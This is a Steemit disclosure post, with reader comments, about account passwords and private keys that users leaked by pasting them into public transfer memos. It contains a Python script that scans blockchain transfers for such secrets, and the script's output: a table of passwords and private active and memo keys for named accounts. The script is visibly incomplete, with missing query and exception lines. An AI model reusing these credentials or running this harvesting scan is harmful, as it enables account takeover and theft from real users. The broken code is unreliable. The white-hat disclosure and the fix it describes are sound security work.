We just hacked 11 accounts on Steemit! ~$21 749 in STEEM and SBD is under our control. But we are good guys 😇 So...
Actually, we - @noisy & @lukmarcus - have gained access to 9 passwords, 2 private active keys and 64 private memo keys, but first, TL;DR:
- no, we didn’t hack Steem blockchain
- no, we didn’t hack steemit.com website or any other service build on top of Steem
- we didn't steal those funds, despite the fact that we could easily do that
- we changed passwords of all compromised accounts
- we transferred all funds into saving accounts of each account (to show, that we do not want to take them)
- the problem is with 2 accounts to which we have active keys. We cannot change password without old password or owner key, so we make sure, that those funds are safe on saving accounts.
- what we did, we exploited a flaw in design of steemit website, which caused that many users made exactly the same fatal mistake:
What actually did happen?
Few days ago I noticed in my cousin's wallet, that he accidentally pasted his own password into wrong field (a memo field), when he made a transfer. I warned him, so he changed his password. But this got me thinking... if he could make such mistake, anyone could do that! And unfortunately I wasn't wrong :(
So I wrote a script, which analyze all transfers in Steem history, which checked each memo, whether it is a match with current public keys of a user:
import csv
import pymssql
import json
from steembase.account import PrivateKey, PasswordKey
from multiprocessing import Process, Queue, Manager
q = '''
sender.owner sender_owner,
sender.active sender_active,
sender.posting sender_posting,
sender.memo_key sender_memo_key,
receiver.owner receiver_,
receiver.active receiver_active,
receiver.posting receiver_posting,
receiver.memo_key receiver_memo_key
FROM TxTransfers
INNER JOIN Accounts as sender
ON TxTransfers."from" = sender.name
INNER JOIN Accounts as receiver
ON TxTransfers."to" = receiver.name
WHERE TxTransfers.type = 'transfer'
AND TxTransfers.memo != '';
def get_keys(field):
return [key_auth[0] for key_auth in json.loads(field)['key_auths']]
def get_public_keys_from_fields(public_keys_by_account, account_name, owner_field, active_field, posting_field,
if account_name not in public_keys_by_account:
public_keys_by_account[account_name] = {
'owner': get_keys(owner_field),
'active': get_keys(active_field),
'posting': get_keys(posting_field),
'memo': [memo_key_field],
return public_keys_by_account[account_name]
def get_public_key_from_password(shared_dict, account_name, password):
if account_name + password not in shared_dict:
shared_dict[account_name + password] = str(
PasswordKey(account_name, password, 'owner').get_private_key().pubkey)
return shared_dict[account_name + password]
def get_public_key_from_private(shared_dict, priv_key):
if priv_key not in shared_dict:
shared_dict[priv_key] = str(PrivateKey(priv_key).pubkey)
return shared_dict[priv_key]
def worker(
print('[{}] worker started'.format(pid))
while not transactions_queue.empty():
i, account_name, public_keys, memo = transactions_queue.get()
print('[{}][{}] Testing "{}" against "{}"'.format(i, pid, account_name, memo))
public_owner_key = get_public_key_from_password(public_keys_from_passwords, account_name, memo)
if public_owner_key in public_keys['owner']:
print("[{}] Gotcha! Found main password for '{}' account: {}".format(pid, account_name, memo))
results_queue.put((account_name, 'password', memo,))
some_public_key = get_public_key_from_private(public_keys_from_private_keys, memo)
for role in ['posting', 'active', 'owner', 'memo']:
for key in public_keys[role]:
if key == some_public_key:
"[{}] Gotcha! Found private {} key for '{}' account: {}".format(
pid, role, account_name, memo
results_queue.put((account_name, role, memo,))
except AssertionError:
print('[{}] AssertionError: {}'.format(pid, memo))
except ValueError as e:
if str(e) == 'Error loading Base58 object':
elif str(e) == 'Odd-length string':
print('[{}] worker ended'.format(pid))
def save_results(results_queue):
tmp = set()
with open('results.csv', 'w+') as file:
writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\")
writer.writerow(['account', 'type', 'memo'])
while True:
result = results_queue.get()
if result == 'kill':
if result not in tmp:
def main():
manager = Manager()
existing_public_keys_by_account = {}
public_keys_generated_from_potential_passwords = manager.dict()
public_keys_generated_from_potential_private_keys = manager.dict()
transactions = Queue()
results = Queue()
conn = pymssql.connect('sql.steemsql.com', 'steemit', 'steemit', 'DBSteem')
cursor = conn.cursor()
with open('transactions.csv', 'w+') as file:
writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\")
'id', 'tx_id', 'type', 'from', 'to', 'amount', 'amount_symbol', 'memo', 'request_id', 'timestamp',
'sender_owner', 'sender_active', 'sender_posting', 'sender_memo_key',
'receiver_owner', 'receiver_active', 'receiver_posting', 'receiver_memo_key')
for row in cursor:
print('.', end='')
writer.writerow([str(item).replace('\r\n', '') for item in row])
with open('transactions.csv', 'r') as file:
reader = csv.reader(file, quotechar="\"", delimiter=";", escapechar="\\")
next(reader) # skipping the header
for i, (
id_, tx_id, type_, from_, to_, amount, amount_symbol, memo, request_id, timestamp,
sender_owner, sender_active, sender_posting, sender_memo_key,
receiver_owner, receiver_active, receiver_posting, receiver_memo_key
) in enumerate(reader):
sender_keys = get_public_keys_from_fields(
existing_public_keys_by_account, from_, sender_owner, sender_active, sender_posting, sender_memo_key
receiver_keys = get_public_keys_from_fields(
existing_public_keys_by_account, to_, receiver_owner, receiver_active, receiver_posting,
transactions.put((i, from_, sender_keys, memo))
transactions.put((i, to_, receiver_keys, memo))
processes = []
for i in range(WORKERS):
p = Process(target=worker, args=(
listener = Process(target=save_results, args=(results,))
for p in processes:
if __name__ == '__main__':
which returned:
account | type | memo |
dunja | password | hurehurehure1234 |
anwen-meditates | password | P5Kk17eRvytzkRzzngp1CdVbQvRqFUq8wrvw8SqNdcZwXot2JRXA |
jakethedog | password | P5JEo9aSW6CAF6apUsMbxqSe6r991T5G35uXcoYMP1PmifBRqX87 |
miketr | password | P5JEZWqSV28XAGrwMXn5G2Sx4dADvS5mz4DrrtjoraY8nmB59Rrb |
blacktiger | password | P5HufQw3V442c4DREjUL4Ed4fQ41VzBhPtn5SkCBDJ25tuRFg1UC |
quetzal | password | P5KC2JAHPyuA5tBn4K8PxoLuwXqHx51GHy7tG3gD7DupKH8NxqZz |
tieuthuong | password | P5HybN5mguE6G2QB4BVKbreexEtxJD84veHcz4s3L9R8JLQ6m85V |
aubreyfox | password | P5J5wS2gkQBv3U6WPgHU9gUTitbWE4V5CKYeEhZGVa3VGgkzQU2p |
virtualgrowth | password | P5Kifqmdm38WPHpn2FUigLbhfD7FatHAHfcuRU5xSi16AFJFex3r |
trump | active | 5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 |
amrsaeed | active | 5JqaDeu2s3BsG9QYenpz2xjLfg3qdaeWhXduYNUSmK7KWAywx93 |
trump | memo | 5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 |
alao | memo | 5JBGwoooi1gEUXBhu6up1qWdsKKKG1TEakQwaBNMb95dup5f9xh |
athleteyoga | memo | 5KU2dcxLpSCJZ4SB8eBqUJs2PCEuwfx7w2XYCUmcnLqgdHHqjq2 |
beeridiculous | memo | 5KHkKyHpxDBuuKGt5QwTbb42bxmMUo1Xk9efBKU7wUoRed2Ak8z |
romanskv | memo | 5JzZ1BUHGrYrmu9Kms5mFK2nhQPFSxKHXp5mtcfMrQWioEgJTfE |
blockiechain | memo | 5JJZPu2z6DfhyGFsm9b458wff8H168f4yiAidbsWq55YSbFLd3a |
bloodhound | memo | 5JQZo8QDuQ1eDqsgMnVHg1ujqYNUTEDV4KYZyeSdbzSAbXMsSuV |
bryguy | memo | 5JdJHDcgeqyaHEgmyTbob221RUvttqyRVVPViAMzuq4hWJKw6sa |
churchsoftware | memo | 5KB3B3rHxvvaR3C2gfNyKkkReqdfbsjPs4AZ8ceiiR4B49oCDmJ |
chuckles | memo | 5KWf41ixGbPMpAxNhe47jtTVbyAi9Su4mZrHaVanYP2rQWoPUUk |
coincravings | memo | 5Jp6RJ71B824qc2cHXLPNYHZPD1BgxE2rFMyEpDszjqussW5iSA |
colombiana | memo | 5JaewDd6gw4AjXGhABCdZk2FHrwxHJnJDWZmkUzJYuny6rarbf3 |
cryptoeasy | memo | 5JNv71NgwCRUDAQu1NP67TDRVHKmRnnGLRfNFMwAKS8fTMLvLkQ |
datkrazykid | memo | 5JbiRrFrv9GLMjjPYZA8K7AWxAXQThs5AefWj1JgqjzMS2jLdng |
dollarvigilante | memo | 5Hqzx26rSmSJ2o5VB8gicf3F2Q6BU35n1nMNajcEmDxMietvUVx |
dethie | memo | 5K3BBi9pETRGG7KkS7VDrWY7exDCCi315prn2Mf9dTuR9vCejEH |
francoisstrydom | memo | 5Jkw1HdHc1ucwTosaqhXVAhyG848d1ZJprQsrwP1UEctazBvU3D |
farinspace | memo | 5JMckr9WkVbRZdbeMwQ6CNwTWBfrp4vTBy9K1YTJyZ76XBbRgZW |
golgappas | memo | 5K8zaCwcXWjQPjs6JGH896pGb6jENyMNU19g1hSsYXW1X2Dour1 |
goldrush | memo | 5JKCSn4xwHHCTBNy1MYJgbLDpYGR434A43gUvGPCVJPAs49GMvX |
hithere | memo | 5HxdErB3wPUDQKWEcjNBBWLpB1uJ8aMrY1tK5ZA1k56MqmTtT31 |
iaco | memo | 5JTYW5HfPJJX47VRT1Cq9Nz8aSruWKhETiD6oo9GPJNteQ5RPke |
inphinitbit | memo | 5J9uWL39vDYgEosscgxEziYQ2ybPbxM5e9sPkzTxgqTgNYC7Mx7 |
jellos | memo | 5JYXarzjE5afBtHcjhvdUcczrqCsfUEyxVRTKAFyDdjGatkTNNy |
kakradetome | memo | 5JuMh7FikJ1UVpUauF3J1e7MHj562z8Zmnp29pauVgPw3A4SgYC |
kingofdew | memo | 5HrSQ9yJizKCbDAu2Di9PnSuMPwMuNQCiKRdBUqzHFZySWQmtbL |
malyshew1973 | memo | 5KbD93C9XLGL4Aa4ncSpRnXCVuSRTvRRP6gANwHPbUeWBaPf4Eq |
leesmoketree | memo | 5Kctn9BvtxB3CXzzX4GMcmLygq42LqisCZr5MAy7VYPzvwX5o7u |
lichtblick | memo | 5J9jkRijjAn8o8DXt8R1ujSZHtahevVCw8CGzPEjnvCEsqkXjHy |
lopezro | memo | 5K6rmYGbHaGsAyGLpQMNupWcmjQFHvjX2GtYyCrC3KMgWAWcNci |
lostnuggett | memo | 5JEKwfrtSEFvw8P8qnWyDhfxnQTRB5Vn2WxwW3tE4gL4pZiwPcQ |
luani | memo | 5Jo7p98JCpTiH1q9kVC81etym4QSHRRpLDvxumRW7BXouDu8Yfd |
mama-c | memo | 5HqAhZBvbBJKVWJ1tsrg7xnS1dvNNyxBoHzp8Snvp9C6Uawx66x |
marionjoe | memo | 5KUpMmkx6hrPanwKzUvrHTonLDQkZAoiJwESogHAMSeuFsB1Lqc |
maxfuchs | memo | 5J9CvSGNyLBgUwhKtsTWCqTddbDZJ4tFrVSyWFzDstsQiG9spPe |
mkultra87f | memo | 5J8mDeubzJwEtHsbPzfUCVetNgPrVgQVHUBQDySH7v1qSS44DBf |
mrsgreen | memo | 5JyAaFEdEriRLpQ9uEXGoeNyHpw1TscqN6VP6iNjpoFbA8JCrMP |
nathanhollis | memo | 5Kk1N4nxMPbqVuJCVt3MUjz5dvJR716cUAdf6c3kToqzMqT8rRu |
murat | memo | 5K8R2J7xiLRN3HWdAy5Zym4taE74o9DWF8FV82HHFrqNUZDzdxW |
nikolad | memo | 5KdeDUj92w2HXsLH6V6SpNGPAeyBtJEU5jVoqZyjaHDkE39AkzF |
niliano | memo | 5KCPgZBnLziZC88e44j8GxK11XYdpQyo8WFxocBH24jAhEnVN6z |
norbu | memo | 5J5HyEwx54MwKW8gpsSBzvwAweHRjH11CXs85RCNWSooyPYRaeh |
onighost | memo | 5HwsjHgWMmJSLdiVgdxbRWqyvFtsKRC3Mk2tDzkpW4293ssTa6V |
pinkisland | memo | 5JAymGCYWxhojoyQsfAC4x619nq5vkcQBhMWjEZHwiitodBYFV5 |
rawmeen | memo | 5JnLMoPRry2n361tPxQq7MYy16tn5PuT2PmsP1FLrRGJsp1Vfem |
qamarpinkpanda | memo | 5K4SgN4tps3HRiyy49m5rfWNCZmyBVYv7eFF3CTRkcJJPQsExTb |
richarddean | memo | 5JPPUidz7rPN6VPHFJQbjnh8a3JQCDzP7fJSt93EQkUeLr3gmJJ |
saramiller | memo | 5K8My6Afbi6ff5CeFByB5e9zQG4QUX4MtMRHs7Ux9Tvu4ZSP7H4 |
slimjim | memo | 5HtkqVNSBj4kf6tyyyNPBgpnbgkrvATM1wBYY4mkNfxs9xiYHbv |
smisi | memo | 5Hsre3qaCDBcxwGiig5qFc65dwf2NfAssUUTXfCWFmbhbxPz7bL |
sraseef | memo | 5K558SavQVHXnKn6k8CoKe28T3FAmmAtRJuCMjpwdSwR6sT9rYq |
steemshop | memo | 5JRoiSJw18Vj3rGt5mrd4JeuxL1Wb1YpGyFDQu9pFrKmckr6kTu |
surpriseattack | memo | 5K8Be3nW33Lc5vqRUJx3xmoLFnMMmJPMthYHb16i7R2gwFTJqh3 |
tee-em | memo | 5KPT9Nhtho3qaAFkGQ4zqy7Dae1729WdYM5wL3UPyKVuTauonif |
theofphotography | memo | 5KRJ9qt8E9o6KXFhfyW7PJH7sDsmSBVaBeC8SmLR5LmReQii44Y |
thunderberry | memo | 5JxtXr2cMTkbU37CDtPyFdGuTT9fPceNemwnJDsqAdMoV5msLEP |
tomino | memo | 5JPBiMwfrqTdgZhW16LjdeMZv29gtKQC4eb4jyVTpk2Vvx5MHde |
worldclassplayer | memo | 5JQBm8pn5vwChYdoxx3tJw6dkBFeQpKBKia5roB9DqXZMoFdF4h |
writemore | memo | 5JJTZpTEvw4C7cnU7Q9NfzUnXSYqwYLLxkP7B3c39Z82Uwzj14d |
wthomas | memo | 5HwbsX4CTKtCJLH8QYuVBTvCbJYQwwFDiCCKy99uNLCHpoazo6N |
walcot | memo | 5KJjeTJGM8FjjDpj8mHRFpjae5SeSZ9Y8CGaBJC7VqFUGR25Qa6 |
vovaha | memo | 5J9Wxf1Xz1hXvMd7ubXHNZXhFoF1yhQT3GSHNVmRNXERCnBZJ7e |
The fix
I created and submitted a fix, to prevent such mistakes in a future:
My Account was hacked - what I should do?
Actually, I cannot reach you on steemit.chat or discord to give you your new generated password. Why is that? Because no one can have a certainty, that you actually have the same login on different service. I do not want to risk giving access to your account to someone who just pretend to be you.
You should go to: https://steemit.com/recover_account_step_1
and you will be able to restore access to your account with a help of steemit and your email address.
My account is on a list, but only private memo key was exposed. What should I do?
You should change your password immediately.
You can do that on: https://steemit.com/@<your_login>/password
Right now (according to my knowledge) exposed memo key do not make a damage, but it was said few times, that those private keys in the future might be be used to encrypt private messages. Exposed private memo key would mean, that anyone could read your private messages. You don't want that, right?
What next?
You can expect from me in very near future few posts about security (for total newbies and for developers):
- How private and public keys works. What is the difference between password and a private key
- Why Steemit didn't detect that I checked passwords of 183388 users
- Very detail explanation of how passwords are stored by steemit in your browser, and why it is secure
- How to set own password, which is not generated by Steemit
- How to make you account on Steemit more secure, by using only private posting key for every-day use
Make sure, you follow me, to learn more about how to keep your fortune earned on Steemit more secure :)
nice work, noisy! with community heroes like you and @lukmarcus, we are continually becoming stronger than ever
Would be great if you could have someone acknowledge these github issues...
Would also be good if we could get some sort of 2 FA option on the wallet.
would Trezor integration be possible?
Not sure. I haven't really tried hardware wallets yet but it is something I need to look into.
Nice idea!
2FA is essential in this space... I agree
2 FA cannot be created for blockchain-based system. There would have to be email/sms on blockchain
OK - is there some other solution you can think of?
user should never use password on steemit. They should use only private posting key. I am writing article about that as we speak...
Yes for sure but is there any other way to increase security?
hmmm...actually some kind of 2of3 multisig with 3rd party service could be made.
it is not secure yet. Account can be hacked
Spotted this a month ago but thought a post will be sufficient to get the word out. i am not so techy, so my post is mostly my voice. Steemit is letting me peer into more and more things! I have started to learn some coding fundamentals. i gave my novice tip as possible fixes within my post, hoping it helps! https://steemit.com/steemit/@surpassinggoogle/this-could-be-the-easiest-way-to-lose-your-steemit-account-or-password-and-possible-fix-steemit-inc-take-a-look
Steemit is the best!
i'm addicted to steemit.
I just started tonight. Comments like these give me... hope? Lol! :D
We just try to walk a German blogger throught the recovery, who "lost" his account in this (amazing and useful ) hack. Unfortunately it isn´t possible to recover an account by facebook. What is the alternative? Can there be a fix?
@noisy @ned
which account?
Seems @Twinner already talked to you and mike can post and vote again... THX!
💖💖💖💖 💖💖💖💖

No doubt. loool I love this meme bdw
I wish more people understood the value of a good meme
meme's get undervalued by people....so sad. I made a post about meme's in fact
cool baby
I agree;) See if those minds can come up with a solution to a problem that WE ARE ALL ABOUT TO FACE involving capital gains tax. Id love to see a clever work around/strategy for the problem below:
Need some critical thinkers.
I hate taxes
@noisy & @lukmarcus You guys are awesome!!
Wao this is quite interesting
Thanks, for your efforts!
Detecting these things early, and prevent future events will grow the trust in this platform!!!
couldn't agree more!
Go STEEM! ;) The way u handle thinks like this are awsome, thanks for the platform and some freedom guys!
Good job idd! Last month I wrote a request for the programmers in the Steemit community: https://steemit.com/hardwarewallet/@michiel/hardware-wallets-new-and-incredible-interesting-devices-idea-for-steemit
I am not a coder, so I can only spread the idea. Hope someone will pick it up and create the possibility to secure a Steemit account for 100%
We're like two good cops :)

Yes, this great work for the community!!
I'm amazed at how smart our community is. This is unreal!!
Thanks guys @noisy & @lukmarcus!
I love the way steemit is doing thing!
We have to be diligent, both personally and as a community.
Thanks for your great work @noisy and @lukmarcus! Much thanks for helping everyone know how to do Steemit life a little better and safer.
i think yes
Great work
Great job. Glad it was a white hatter that got his hands on this first! Your a good person and I'm sure some people will be happy you won't be taking their funds!
Yea, this is guy is with not standard heart beating :)
Please @noisy be at Lisbon's Steemfest, i want to shake your hand if i could make it there😊......Steem Super Hero
I noticed this possibility and gave some novice tips in my post from a month ago:
Thank you Noisy. Great work.
Krzysztof love your use of ethical hacking here to help fix a bug and thank you for sharing the accounts to help us know if we need to change our passwords now!
Amazing work! :) best type of hacking, as you can keep the rewards with a clean conscience and gain people's trust and respect! :) well done :) followed and upvoted for the hard work!
White hattin' like a boss!
I think this is the first time I run directly into whitehat hackers. And thats darn cool. :)
Hopefully the reward you get from this post will be big :) Hackers better think long term, joining the good guy side pays off more IF you know how to do it right.
We, as a community have all the power we need to make sure the good guys are properly rewarded. I threw my vote on this article and plan to resteem it.
It would be really nice if the wallet gave a newbie explanation by each "key" in the wallet. I am confused by the current messages. I lean towards being afraid to give any key to anyone, but I totally see where the confusion comes in.